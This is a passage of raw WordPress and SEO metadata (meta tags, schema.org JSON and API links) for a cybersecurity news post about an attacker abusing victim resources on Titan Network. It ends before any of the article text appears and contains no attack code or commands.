property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2024-10-30T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/TitanNetwork-thumbnail:Large?qlt=80\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Attacker Abuses Victim Resources to Reap Rewards from Titan Network\",\"datePublished\":\"2024-10-30T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\\\/\"},\"wordCount\":1620,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/TitanNetwork-thumbnail:Large?qlt=80\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Cyber Threats\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\\\/\",\"name\":\"Attacker Abuses Victim Resources to Reap Rewards from Titan Network 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/TitanNetwork-thumbnail:Large?qlt=80\",\"datePublished\":\"2024-10-30T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\\\/#primaryimage\",\"url\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/TitanNetwork-thumbnail:Large?qlt=80\",\"contentUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/TitanNetwork-thumbnail:Large?qlt=80\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Attacker Abuses Victim Resources to Reap Rewards from Titan Network\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n","yoast_head_json":{"title":"Attacker Abuses Victim Resources to Reap Rewards from Titan Network 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/","og_locale":"en_US","og_type":"article","og_title":"Attacker Abuses Victim Resources to Reap Rewards from Titan Network 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2024-10-30T00:00:00+00:00","og_image":[{"url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/TitanNetwork-thumbnail:Large?qlt=80","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Attacker Abuses Victim Resources to Reap Rewards from Titan Network","datePublished":"2024-10-30T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/"},"wordCount":1620,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/TitanNetwork-thumbnail:Large?qlt=80","keywords":["Trend Micro Research : Articles, News, Reports","Trend Micro Research : Cyber Threats","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/","url":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/","name":"Attacker Abuses Victim Resources to Reap Rewards from Titan Network 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/TitanNetwork-thumbnail:Large?qlt=80","datePublished":"2024-10-30T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/#primaryimage","url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/TitanNetwork-thumbnail:Large?qlt=80","contentUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/TitanNetwork-thumbnail:Large?qlt=80"},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : Articles, News, Reports","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-articles-news-reports\/"},{"@type":"ListItem","position":3,"name":"Attacker Abuses Victim Resources to Reap Rewards from Titan Network"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/57536","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=57536"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/57536\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=57536"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=57536"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=57536"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

{"id":57536,"date":"2024-10-30T00:00:00","date_gmt":"2024-10-30T00:00:00","guid":{"rendered":"urn:uuid:8edc3119-2f51-38e1-b313-3da653f550c9"},"modified":"2024-10-30T00:00:00","modified_gmt":"2024-10-30T00:00:00","slug":"attacker-abuses-victim-resources-to-reap-rewards-from-titan-network","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/attacker-abuses-victim-resources-to-reap-rewards-from-titan-network\/","title":{"rendered":"Attacker Abuses Victim Resources to Reap Rewards from Titan Network"},"content":{"rendered":"